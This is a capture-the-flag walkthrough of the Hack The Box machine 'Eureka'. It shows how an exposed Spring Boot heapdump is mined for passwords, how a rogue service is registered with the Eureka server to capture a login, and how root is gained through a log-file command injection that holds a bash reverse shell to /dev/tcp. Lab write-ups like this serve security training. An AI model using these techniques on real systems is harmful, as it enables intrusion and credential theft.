⚜️Eureka
https://app.hackthebox.com/machines/Eureka
Recon
Using the Scripts/Functions/Tools
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
| 256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_ 256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelAdding new hosts
10.129.242.192 eureka.htb furni.htbFurni-Website
➜ eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordlist size: 10403
Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_furni.htb/__25-04-27_22-17-19.txt
Target: http://furni.htb/
[22:17:19] Starting:
[...]
[22:17:27] 200 - 2KB - /actuator
[22:17:27] 400 - 105B - /actuator/;/sso
[22:17:27] 400 - 115B - /actuator/;/springWebflow
[22:17:27] 400 - 112B - /actuator/;/statistics
[22:17:27] 400 - 113B - /actuator/;/ssoSessions
[22:17:27] 400 - 108B - /actuator/;/status
[22:17:27] 400 - 112B - /actuator/;/threaddump
[22:17:27] 400 - 107B - /actuator/;/trace
[22:17:27] 200 - 20B - /actuator/caches
[22:17:27] 200 - 6KB - /actuator/env
[22:17:27] 200 - 2B - /actuator/info
[22:17:27] 200 - 467B - /actuator/features
[22:17:27] 200 - 76MB - /actuator/heapdump
[22:17:27] 200 - 3KB - /actuator/metrics
[22:17:27] 200 - 54B - /actuator/scheduledtasks
[22:17:28] 200 - 198KB - /actuator/beans
[22:17:28] 400 - 108B - /actuator/sessions
[22:17:28] 405 - 114B - /actuator/refresh
[22:17:28] 200 - 96KB - /actuator/loggers
[22:17:29] 200 - 15B - /actuator/health
[22:17:29] 200 - 35KB - /actuator/mappings
[22:17:29] 200 - 180KB - /actuator/conditions
[22:17:29] 400 - 106B - /admin/%3bindex/
[22:17:30] 200 - 824KB - /actuator/threaddump
[22:17:30] 400 - 98B - /admin;/
[22:17:31] 400 - 98B - /Admin;/
[22:17:31] 200 - 36KB - /actuator/configprops
[...]Leaking information because of misconfigured Spring Boot Acutators http://furni.htb/actuator/env
Checking a common entry points list
/actuator/env
/actuator/auditevents
/actuator/beans
/actuator/caches
/actuator/configprops
/actuator/flyway
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/info
/actuator/integrationgraph
/actuator/liquibase
/actuator/configprops
/actuator/shutdownWe find a heapdump at http://furni.htb/actuator/heapdump
Using a script with the help of chat-gpt we find a password:
GNU nano 8.3 head-search.sh
#!/bin/bash
# Usage check
if [ $# -lt 1 ]; then
echo "Usage: $0 <heapdump-file>"
exit 1
fi
HEAPDUMP="$1"
OUTPUT="sensitive_findings.txt"
# Colors
RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
echo "[*] Extracting and searching in $HEAPDUMP..."
echo "" > "$OUTPUT"
# Search for sensitive patterns
strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =:][^[:space:]]+|pwd[ =:][^[:space:]]+|secret[ =:][^[:space:]]+|token[ =:][^[:space:]]+|key[ =:][^[:space:]]+|credential[ =:][^[:space:]]+|auth[ =:][^[:space:]]+|sess>
echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential sensitive items."
echo
# Pretty print
while IFS= read -r line; do
if echo "$line" | grep -iq 'password\|passwd\|pwd'; then
echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}"
elif echo "$line" | grep -iq 'secret\|token\|key\|credential\|auth\|session'; then
echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}${NC}"
elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}'; then
echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}"
elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'; then
echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}"
elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then
echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}"
else
echo -e "${YELLOW}[OTHER]${NC} $line"
fi
done < "$OUTPUT"
echo
echo "[*] Full results also saved in: $OUTPUT"[..]
[PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!,
[..]User
➜ eureka ssh oscar190@furni.htb
oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun 27 Apr 2025 09:00:04 PM UTC
System load: 0.0
Usage of /: 63.8% of 6.79GB
Memory usage: 47%
Swap usage: 0%
Processes: 244
Users logged in: 0
IPv4 address for eth0: 10.129.182.126
IPv6 address for eth0: dead:beef::250:56ff:fe94:4834
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71
oscar190@eureka:~$
We find another password in the application.yml of the eureka-server
oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password|secret|api[_-]?key|token' ./target/classes/application.yaml
name: "Eureka Server"
security:
user:
name: EurekaSrvr
password: 0scarPWDisTheB3st
server:
port: 8761
address: 0.0.0.0
nmap-full-scan
The full scan shows the other http-server eureka on port 8761 or like seen in the command above
Eureka-Server
Using these credentials we can login
Create new fake service using this Hacking Netlix Eureka as example
curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
"instance": {
"instanceId": "USER-MANAGEMENT-SERVICE",
"hostName": "YOURIP",
"app": "USER-MANAGEMENT-SERVICE",
"ipAddr": "YOURIP",
"vipAddress": "USER-MANAGEMENT-SERVICE",
"secureVipAddress": "USER-MANAGEMENT-SERVICE",
"status": "UP",
"port": { "$": 8081, "@enabled": "true" },
"dataCenterInfo": {
"@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
"name": "MyOwn"
}
}
}'After some time we get the User and Password on our listener
➜ eureka rlwrap nc -nlvp 8081
listening on [any] 8081 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338
POST /login HTTP/1.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1,127.0.0.1
X-Forwarded-Proto: http,http
Content-Length: 168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148"
X-Forwarded-Port: 80
X-Forwarded-Host: furni.htb
host: 10.10.14.71:8081
username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=BDpsWbgK9mVLFJVx5FuxOvZT2DfbiKCuM7CjmcVRPi8gMtPBNwpbOoBrwwRmJfBBhnaFA8My9VbqvJKDAoKUoadmD04YULD3ls
Change the coding using cyberchef we get the user-flag
➜ eureka ssh miranda-wise@furni.htb
miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu 10 Apr 2025 07:41:57 AM UTC
System load: 0.04
Usage of /: 84.1% of 8.02GB
Memory usage: 44%
Swap usage: 0%
Processes: 248
Users logged in: 1
IPv4 address for eth0: 10.129.232.19
IPv6 address for eth0: dead:beef::250:56ff:feb9:f97
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71
miranda-wise@eureka:~$
Root
Checking for procs running with root privs show us a log_analyse.sh
ps -eo user,pid,comm | grep '^root'
[..]
root 4105259 log_analyse.sh
root 4105350 log_analyse.sh
Searching for log_analyse.sh
miranda-wise@eureka:/$ find . -name log_analyse.sh
find: ‘./boot/lost+found’: Permission denied
find: ‘./var/tmp/systemd-private-83645e554a1047198652b4
[..]
./opt/log_analyse.sh In that file at analyze_http_statuses() we can
code=$(echo "$line" | grep -oP 'Status: \K.*')miranda-wise@eureka:~$ rm -f /var/www/web/user-management-service/log/application.log
miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log➜ eureka rlwrap nc -nlvp 1337 │➜ eureka ssh miranda.wise@furni.htb
listening on [any] 1337 ... │miranda.wise@furni.htb's password:
│Permission denied, please try again.
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958 │miranda.wise@furni.htb's password:
bash: cannot set terminal process group (1726439): Inappropriate ioctl for device │
bash: no job control in this shell │➜ eureka
root@eureka:~# Last updated